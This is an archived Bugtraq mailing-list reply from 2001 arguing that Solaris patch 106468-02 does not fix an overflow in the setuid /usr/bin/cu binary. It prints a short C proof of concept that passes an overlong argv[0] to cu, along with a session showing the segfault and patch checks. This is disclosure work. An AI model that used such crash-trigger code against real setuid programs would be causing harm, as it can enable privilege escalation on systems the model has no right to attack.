Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: Solaris /usr/bin/cu Vulnerability
From: Dan Harkless <dan-bugtraq () DILVISH SPEED NET>
Date: Mon, 29 Jan 2001 20:21:39 -0800

hal King <hck () UTK EDU> writes:
In Solaris 2.6 patch 106468-02 replaces cu in Sol 7 patch 108372-01 replaces
   it for gets() use. The script does SegFault in 8, but no core file... I am
   running 10/2000 revision and 108372 came out in may, so it's probably cool.

Are you implying the above patches fix the cu long hardlink name
vulnerability?  This is not the case, at least on 2.6:

    # cat > cu_exploit.c
    #include <stdio.h>

    void main(int argc,char **argv)
    {
    char *buf;

    buf = (char *) malloc(atoi(argv[1])*sizeof(char));
    memset(buf,0x41,atoi(argv[1])-1);
    buf[atoi(argv[1])-1]=0;
    execl("/usr/bin/cu",buf,(char *)0);
    }
    # gcc cu_exploit.c
    cu_exploit.c: In function `main':
    cu_exploit.c:4: warning: return type of `main' is not `int'
    # a.out
    Segmentation fault
    # uname -a
    SunOS shell1 5.6 Generic_105181-23 sun4m sparc SUNW,SPARCstation-5
    # showrev -p | fgrep 106468-02
    Patch: 106468-02 Obsoletes:  Requires:  Incompatibles:  Packages: SUNWbnuu
    # pkgchk -p /usr/bin/cu
    ERROR: /usr/bin/cu
        permissions <4111> expected <0111> actual

106468-02 was a patch from last summer, fixing an unspecified (but
presumably different) security problem in cu and uustat.

----------------------------------------------------------------------
Dan Harkless                   | To prevent SPAM contamination, please
dan-bugtraq () dilvish speed net  | do not mention this private email
SpeedGate Communications, Inc. | address in Usenet posts.  Thank you.


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]